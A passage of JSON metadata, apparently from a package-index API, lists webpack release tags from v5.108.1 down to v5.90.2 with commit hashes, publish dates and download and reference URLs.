https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https:/